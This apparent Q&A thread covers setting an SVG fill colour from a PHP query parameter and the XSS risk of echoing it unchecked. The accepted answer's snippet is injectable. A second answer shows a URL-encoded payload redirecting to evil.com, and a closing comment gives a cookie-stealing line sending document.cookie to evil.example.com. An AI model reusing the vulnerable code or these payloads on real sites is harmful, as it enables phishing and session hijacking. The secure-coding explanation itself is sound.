# Choosing a color based on URL in a PHP file

Tags: php, svg, colors, fill

I have seen this done with SVGs, and I'm not sure what to search to find something similar.  Everything I have searched are unrelated results.

Lets say I have a PHP file that contains:

```
<style>
  .logo {

  }
</style>
```

I want to be able to type the URL like `my.php?fill=be0000` and the php to return:

```
<style>
  .logo {
    fill: #be0000;
  }
</style>
```

I know this is fairly simple, I just cant figure it out.

Answer (score 0, accepted):

There are many ways to implement this, but here's one suggestion:

```
<style>
   .logo {
     fill: #<?= !empty($_GET["fill"]) ? $_GET["fill"] : "00bf00" ?>;
   }
</style>
```

This would set the value to whatever is passed in the `fill` GET parameter or `00bf00` if it's not set.

Comment: this does exactly what I was looking for, I don't reference it without passing a color anywhere, but I tried because you said it would default.  Just going to the php file resulted in a PHP error `Notice: Undefined index: fill in C:\wamp\www\images\logo.php on line 6`

Comment: @Ryan I have updated my answer to avoid the `Notice`.

Answer (score 0):

I think it's important to stress here that simply fetching data from a query string and plonking it inside your HTML content is totally wrong and should be avoided at all costs.

For example, suppose your PHP code contains the following:

```php
$fill_color = !empty($_GET["fill"]) ? $_GET["fill"] : "ffffff";
echo ".logo { fill: #$fill_color; }\n";
```

It isn't hard to see that this code will work no matter what value is provided for `fill` in the query string. For example, there would be nothing to stop someone requesting a URL such as the following:

```
http://example.com/?fill=red%3B%7D%3C%2Fstyle%3E%3Cscript%3Elocation.href%3D%22http%3A%2F%2Fevil.com%22%3C%2Fscript%3E
```

This will cause your web page to immediately redirect itself to evil.com:

```css
.logo { fill: #red;}</style><script>location.href="http://evil.com"</script>; }
```

This makes it simple to launch attacks including phishing and session theft, which you really should avoid at all costs.

You can avoid these problems if you remember to **NEVER TRUST DATA PROVIDED BY USERS**. In this example, you could perhaps make sure that the value of `fill` consists of six hex digits, *and nothing else*. If it fails this test, you should ignore it.

Here's what your code *should* look like:

```php
$fill_color = "ffffff";
if (!empty($_GET["fill"]) && preg_match('/^[0-9a-f]{6}$/i', $_GET["fill"]) === 1) {
    $fill_color = $_GET["fill"];
}
echo ".logo { fill: #$fill_color; }\n";
```

Comment: I completely understand the risk value of the example you provided, but in my use case is there really any threat of anything like that happening?  I never allow users to input anything for this.  This is simply for an svg inside of a php file, then within my templates i can reference this as an image, IE `<img src="logo.php?fill=ffffff" >`

Comment: *"I never allow users to input anything for this."* — No, that's where you're wrong. I can typ whatever I like into the browser address bar. You have **absolutely no control** over the values sent to your website via query strings, cookies form data or any other means. Never trust anything until you're sure it will cause no harm.

Comment: I see now, all it would take is someone finding the link and submitting anything through it.  I played with your way of securing it, this is the final implantation I have come up with. `<style>
 .logo {
  fill: #<?= !empty($_GET["fill"]) && preg_match('/^[0-9a-f]{6}$/i', $_GET["fill"]) ? $_GET["fill"] : "00bf00" ?>; }
</style>`

Comment: @Ryan Yes, that's fine :-)

Comment: I wish I could private message you.  I was playing around with leaving this open and I keep getting a mismatch error.  example say I wanted this to print the content of the file.  I tried `red;}</style>; echo file_get_contents("logo.php"); }` and a couple other ways with no luck.  Is there a way to do that?

Comment: No, the code you insert via the query string won't be executed by PHP. It will just get put into the HTML source. So you can run Javascript no problem, but not PHP. For example, to steal a session token, use Javascript to insert an image from a remote server under your control, including the victim's cookies in the request URI (e.g. `a=new Image(); a.src="https://evil.example.com/grab.php?c="+btoa(document.cookie);`). On the remote server, create a script `grab.php` that returns a 1px transparent PNG while storing the cookie details and using them to hijack the victim's logged-in session.